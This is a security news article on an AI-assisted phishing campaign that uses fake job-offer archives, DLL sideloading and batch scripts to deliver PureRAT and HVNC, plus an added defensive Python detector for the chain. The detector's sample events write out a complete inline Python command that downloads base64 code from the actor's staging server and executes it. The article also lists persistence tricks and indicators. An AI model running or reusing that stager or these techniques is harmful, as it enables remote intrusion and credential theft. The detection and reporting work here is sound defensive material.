Cybercriminals Leverage AI-Generated Malicious Job Offers to Spread PureRAT Malware

A Vietnamese threat actor is using AI-authored code to power a phishing campaign that delivers the PureRAT malware and related payloads, leveraging realistic job-themed lures to compromise corporate systems.

The campaign, first documented by Trend Micro in December 2025, initially used malicious ZIP and RAR attachments posing as job opportunity documents.

More recent activity observed by Symantec shows an evolution in tactics: instead of attachments, phishing emails now direct victims to download archives hosted on Dropbox, likely to evade email security filters that more aggressively inspect or block executable attachments from unknown senders.

The activity highlights how AI is lowering the barrier for less-skilled cybercriminals to build and automate attack chains with professional-looking tooling.

The lures typically pose as marketing, project management, or strategy roles, with archive names tailored to well-known brands and corporate functions. Examples of malicious archives include:

  • New_Remote_Marketing_Opportunity_OPPO_Find_X9_Series.zip
  • Global_Ads_Strategy_Role_Summary.zip
  • OPPO_FindX9_New_Product_Promotion_Plan.zip
  • Advertising_and_Marketing_Henkel-AG_Smartwash.zip
  • SAMSUNG_OLED_G5_Marketing_Dossier.zip
  • Duolingo_Marketing_Skills_Assessment_oct.zip / .rar

Once opened, these archives usually contain an executable that sideloads a malicious DLL. Legitimate software is abused as the sideloading host, including Haihaisoft PDF Reader, old versions of Microsoft Excel, and renamed Foxit PDF Reader variants.

Rise of AI in Cyberattacks

The executables are often renamed to appear HR-related, such as Salary and Benefits Package.EXE, 2.Salary-benefits-bonus-KPIs(Job responsibilities).exe, or Duolingo_Marketing_Skills_Assessment_oct.exe.

The associated DLLs (for example, oledlg.dll, msimg32.dll, version.dll, profapi.dll) act as loaders for malicious batch scripts.

Those batch scripts strongly indicate AI assistance. One analyzed script, heavily commented in Vietnamese, creates a hidden %LOCALAPPDATA%\Google Chrome directory (note the space; a genuine per-user Chrome install lives under %LOCALAPPDATA%\Google\Chrome), renames the benign document.pdf and document.docx to huna.zip and huna.exe, and uses the latter (a bundled 7-Zip/WinRAR binary) to extract the encrypted archive with the password [email protected].

It then executes a Python interpreter (zvchost.exe) with an inline command that fetches Base64-encoded payload code from http://196.251.86[.]145/huna2, decodes it, and runs it.

Persistence is established through a Run registry key or a scheduled task (for example, one launching 123456.exe) masquerading as ChromeUpdate. The script finally reopens a benign PDF to maintain the illusion of a normal document workflow.
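The chain above leaves several distinct marks in endpoint telemetry: a loader DLL with a system-DLL name loaded from a user-writable directory next to a PDF reader, an executable named like an HR document, a Python interpreter whose on-disk name does not match its PE original filename, an inline "-c" command that fetches and base64-decodes code, and a Run value whose name suggests Chrome but whose target is not the real Chrome install path. The following is an added example written for this page, not code from the article, Trend Micro or Symantec. It runs offline over constructed Sysmon-style events; the field names, the sample paths and the heuristics are assumptions chosen to mirror the behaviours described, and the staging URL is kept in the defanged form used above.

```python
"""Flag the sideloading / batch / inline-Python chain in constructed endpoint events.

Added example (not from the article). Events are dicts with Sysmon-like fields;
everything in SAMPLE_EVENTS is constructed to mirror the behaviours described.
"""
import re

# DLL names the article lists as sideloading loaders.
SIDELOAD_DLLS = {"oledlg.dll", "msimg32.dll", "version.dll", "profapi.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# A genuine per-user Chrome lives here; the actor's "%LOCALAPPDATA%\Google Chrome" does not.
REAL_CHROME = "\\google\\chrome\\application\\"
HR_LURE = re.compile(r"(salary|benefit|bonus|kpi|assessment|job|offer)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+")


def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _dir(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower() + "\\"


def extract_c2(cmdline: str):
    """Return the first URL in a command line, defanged for safe reporting (None if absent)."""
    m = URL_RE.search(cmdline)
    if not m:
        return None
    scheme, rest = m.group(0).split("://", 1)
    host, _, path = rest.partition("/")
    host = re.sub(r"(?<!\[)\.(?!\])", "[.]", host)  # do not double-defang an already defanged host
    return f"{scheme}://{host}/{path}" if path else f"{scheme}://{host}"


def check_process(ev):
    hits = []
    img, cmd = ev.get("image", ""), ev.get("cmdline", "")
    base, orig = _base(img), ev.get("original_filename", "").lower()
    # PE metadata says python.exe but the file on disk is called something else (zvchost.exe).
    if orig == "python.exe" and base != "python.exe":
        hits.append(("renamed_python", img))
    # Inline "-c" stager that fetches, base64-decodes and exec()s code.
    if " -c " in f" {cmd} " and "b64decode" in cmd and "exec(" in cmd:
        hits.append(("inline_b64_stager", extract_c2(cmd) or cmd))
    # Executable named like an HR document, launched from a user profile path.
    if base.endswith(".exe") and HR_LURE.search(base) and "\\users\\" in img.lower():
        hits.append(("hr_lure_exe", img))
    return hits


def check_imageload(ev):
    dll = ev.get("loaded_dll", "")
    # A system-DLL name loaded from the executable's own non-system directory = classic sideload.
    if (_base(dll) in SIDELOAD_DLLS and not _dir(dll).startswith(SYSTEM_DIRS)
            and _dir(dll) == _dir(ev.get("image", ""))):
        return [("dll_sideload", dll)]
    return []


def check_registry(ev):
    key, target = ev.get("target_object", ""), ev.get("details", "").lower()
    # Run value named after Chrome whose target is outside the real Chrome install path.
    if ("\\currentversion\\run\\" in key.lower() and "chrome" in _base(key)
            and REAL_CHROME not in target):
        return [("run_key_chrome_masquerade", ev["details"])]
    return []


CHECKS = {"process": check_process, "imageload": check_imageload, "registry": check_registry}


def scan(events):
    """Return (rule, evidence) pairs for every event that matches a heuristic."""
    alerts = []
    for ev in events:
        alerts.extend(CHECKS.get(ev.get("type"), lambda e: [])(ev))
    return alerts


LURE_DIR = r"C:\Users\u\Downloads\SAMSUNG_OLED_G5_Marketing_Dossier"
# Constructed sample telemetry: four malicious events followed by three benign look-alikes.
SAMPLE_EVENTS = [
    {"type": "process", "image": LURE_DIR + r"\Salary and Benefits Package.EXE",
     "original_filename": "PDFReader.exe", "cmdline": '"Salary and Benefits Package.EXE"'},
    {"type": "imageload", "image": LURE_DIR + r"\Salary and Benefits Package.EXE",
     "loaded_dll": LURE_DIR + r"\oledlg.dll"},
    {"type": "process", "image": r"C:\Users\u\AppData\Local\Google Chrome\zvchost.exe",
     "original_filename": "python.exe",
     "cmdline": "zvchost.exe -c \"import urllib.request,base64;exec(base64.b64decode("
                "urllib.request.urlopen('http://196.251.86[.]145/huna2').read()))\""},
    {"type": "registry", "target_object": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate",
     "details": r"C:\Users\u\AppData\Local\Google Chrome\123456.exe"},
    {"type": "process", "image": r"C:\Program Files\Python312\python.exe",
     "original_filename": "python.exe", "cmdline": "python.exe script.py"},
    {"type": "imageload", "image": r"C:\Program Files\Foxit\FoxitReader.exe",
     "loaded_dll": r"C:\Windows\System32\version.dll"},
    {"type": "registry", "target_object": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\GoogleChromeAutoLaunch",
     "details": r"C:\Users\u\AppData\Local\Google\Chrome\Application\chrome.exe --no-startup-window"},
]

if __name__ == "__main__":
    for rule, evidence in scan(SAMPLE_EVENTS):
        print(f"{rule:28} {evidence}")
```

The renamed-interpreter check is the one most worth wiring into real telemetry: Sysmon's process-creation events carry the PE OriginalFileName, so a mismatch between it and the image name catches zvchost.exe regardless of what the actor renames it to next, whereas the HR-lure regex and the DLL list will need refreshing as filenames change.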

A second, “streamlined” batch variant includes even more obvious AI fingerprints: step-like structure, emoji-style markers in comments, and clean error handling.

AI-Powered Malicious Campaigns

Similarly, Python loaders used to deploy HVNC payloads include numbered sections, detailed debug output in Vietnamese and English, and explicit instructions to the attacker such as “Remember to paste the base64-encoded HVNC shellcode here.”

Multiple indicators tie the operation to Vietnam. Passwords such as [email protected], [email protected], and [email protected] reference a likely Vietnamese operator, with “Hwanxkiem” echoing Hoàn Kiếm, a district in Hanoi.

A GitLab profile (gitlab[.]com/kimxhwan) and filenames embedding that handle further reinforce this attribution. The moniker “Huna” is consistently used across filenames and passwords and may be the actor’s chosen alias.

The targeting and tooling suggest financially motivated cybercrime rather than espionage. By luring jobseekers, possibly across multiple countries, into opening malicious job offers on work devices, the actor appears to be seeking initial access to corporate networks.

PureRAT and HVNC payloads can then provide remote control, allowing the attacker to harvest credentials, move laterally, and ultimately sell access to other threat actors on criminal marketplaces.

This campaign underscores the growing risk of AI-assisted cybercrime: AI is not only enabling more convincing social engineering but also helping relatively low-skilled actors generate sophisticated code, automate complex infection chains, and iterate quickly on their tools.

Organizations should treat unsolicited job offers, especially those involving external file hosting and executable “documents,” as high-risk and ensure endpoint, email, and cloud controls are tuned to detect such behavior.
